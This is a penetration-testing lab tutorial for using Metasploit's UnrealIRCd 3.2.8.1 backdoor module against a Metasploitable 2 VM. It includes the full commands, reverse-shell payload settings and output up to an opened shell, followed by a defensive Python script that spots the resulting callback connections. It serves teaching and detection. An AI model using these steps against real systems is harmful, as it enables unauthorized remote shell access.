Note: these labs are strongly results-oriented and use step-by-step guidance. As you progress, try to find more information and understand what you are doing.
Requirements
Kali Linux: The Kali Linux VM (or any other type of installation)
Metasploitable 2: The Metasploitable 2 VM
Metasploit Framework: Metasploit Framework toolset (installed on Kali Linux by default)
Metasploitable 2 IP: The IP address of the Metasploitable 2 VM. In my case it is 192.168.8.142. This may be different in your specific case.
Kali Linux IP: The IP address of the Kali Linux machine. In my case it is 192.168.8.147. This may be different in your specific case.
Laboratory Workflow
The following describes the steps to carry out during the laboratory. You may introduce variations and learn from them.
1. Launch the Metasploit Framework
msfconsole
2. Search for the appropriate module
search unreal_irc
Matching Modules
================

#  Name                                        Disclosure Date  Rank       Check  Description
-  ----                                        ---------------  ----       -----  -----------
0  exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  No     UnrealIRCD 3.2.8.1 Backdoor Command Execution
3. Use the module
use exploit/unix/irc/unreal_ircd_3281_backdoor
4. Check the module options
options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

Name    Current Setting  Required  Description
----    ---------------  --------  -----------
RHOSTS                   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT   6667             yes       The target port (TCP)

Exploit target:

Id  Name
--  ----
0   Automatic Target

View the full module info with the info, or info -d command.
5. Set the appropriate options
set RHOSTS 192.168.8.142
RHOSTS => 192.168.8.142
6. Show possible payloads
show payloads
Compatible Payloads
===================

#   Name                                        Disclosure Date  Rank    Check  Description
-   ----                                        ---------------  ----    -----  -----------
0   payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
1   payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
2   payload/cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
3   payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
4   payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
5   payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
6   payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
7   payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
8   payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
9   payload/cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
10  payload/cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
11  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
7. Select the payload
set PAYLOAD payload/cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
8. Show options for payload
show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

Name    Current Setting  Required  Description
----    ---------------  --------  -----------
RHOSTS  192.168.8.142    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT   6667             yes       The target port (TCP)

Payload options (cmd/unix/reverse):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address (an interface may be specified)
LPORT  4444             yes       The listen port

Exploit target:

Id  Name
--  ----
0   Automatic Target

View the full module info with the info, or info -d command.
9. Fill the options for the payload
set LHOST 192.168.8.147
LHOST => 192.168.8.147
10. Run the exploit
exploit
[*] Started reverse TCP double handler on 192.168.8.147:4444
[*] 192.168.8.142:6667 - Connected to 192.168.8.142:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.8.142:6667 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 2deEA9aiYAIk24Xy;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "2deEA9aiYAIk24Xy\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (192.168.8.147:4444 -> 192.168.8.142:36910) at 2023-03-28 07:36:16 -0400
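A defender's view of the run above, as an added example that is not part of the original lab: the handler output shows the target opening two connections back to 192.168.8.147:4444 right after the connection to port 6667, and this sketch looks for that pattern in network flow records. The record format, the sample lines, the 30-second window and the function names are assumptions made for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed flow records: time, source IP, source port, destination IP, destination port.
# Addresses follow the lab run above; 192.168.8.150 and port 36909 are made up.
SAMPLE_FLOWS = """\
2023-03-28T07:35:50 192.168.8.150 51512 192.168.8.142 6667
2023-03-28T07:35:51 192.168.8.142 40000 192.168.8.150 113
2023-03-28T07:36:14 192.168.8.147 40122 192.168.8.142 6667
2023-03-28T07:36:15 192.168.8.142 36909 192.168.8.147 4444
2023-03-28T07:36:16 192.168.8.142 36910 192.168.8.147 4444
2023-03-28T07:40:02 192.168.8.142 40001 192.168.8.1 53
"""

def parse_flows(text):
    """Parse whitespace-separated flow lines into sorted tuples, skipping malformed ones."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        ts, src, sport, dst, dport = parts
        flows.append((datetime.fromisoformat(ts), src, int(sport), dst, int(dport)))
    return sorted(flows)

def find_double_callbacks(flows, service_port=6667, window=timedelta(seconds=30)):
    """Flag servers that, after a client reaches service_port, open two or more
    connections back to that same client on a single port within the window."""
    alerts = []
    for t0, client, _, server, dport in flows:
        if dport != service_port:
            continue
        callbacks = defaultdict(list)  # callback port -> server-side source ports
        for t1, src, sport, dst, back_port in flows:
            if src == server and dst == client and t0 <= t1 <= t0 + window:
                callbacks[back_port].append(sport)
        for port, sports in callbacks.items():
            if len(sports) >= 2:  # one connection back (e.g. ident on 113) is not flagged
                alerts.append({"server": server, "client": client,
                               "callback_port": port, "source_ports": sorted(sports)})
    return alerts

if __name__ == "__main__":
    for alert in find_double_callbacks(parse_flows(SAMPLE_FLOWS)):
        print(alert)
```

On the constructed sample only the 192.168.8.147 exchange is reported; the ordinary client at 192.168.8.150 and the DNS lookup are ignored.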
Video
Video that summarizes everything in this laboratory.
Questions
Now that you have completed this exploitation, try to answer the following:
Now, what can I do with the exploitation achieved?
Which type of privileges do I have on the exploited target?